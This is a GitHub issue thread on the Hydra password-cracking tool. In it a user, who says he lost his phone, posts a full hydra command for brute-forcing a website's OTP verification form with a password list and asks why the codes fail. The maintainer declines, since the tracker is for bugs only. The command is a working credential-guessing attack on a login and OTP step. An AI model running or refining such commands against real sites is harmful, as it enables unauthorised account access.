### ISSUE TITLE
HYDRA brute force 

### ISSUE THREAD

**Issue by emmanueljulius719** [vanhauser-thc/thc-hydra#835]
I Lost my phone with my account's and details in it so I tried to get back into my account with Hydra (the website send's an otp when it notice login from another device) using the command
`hydra -l emmanueljulius719@hotmail.com -P pass.txt www.site.com https-post-form "/auth/verify-confirm:principal=08129954327&j_sig=mozilla%2F5.0+%28x11%3B+linux+aarch64%3B+rv%3A102.0%29+gecko%2F20100101+firefox%2F102.0%2C24%7C1520%7C720%7C691%2Cinternal-pdf-viewer%7Cinternal-pdf-viewer%7Cinternal-pdf-viewer%7Cinternal-pdf-viewer%7Cinternal-pdf-viewer%2CLinux+aarch64&c_support=true&_csrf=b9dc6e33-a26f-4080-ab8f-c3396bf4b0f0:H=Content-Type: application/x-www-form-urlencoded:H=Content-Length: 396:H=User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv\:102.0) Gecko/20100101 Firefox/102.0:F=Invalid" -v -V `

The issue is after getting the code from/through hydra and heard back to the website and paste the code the website responsed saying it's and invalid(incorrect) code.
Then I created a new account an tried getting the otp(56280) sent to the registered phone number and get the same error.

What am I doing wrong?

**Comment by vanhauser-thc** [comment]
this is not a help forum. it is for bugs in hydra. this is no bug. sorry
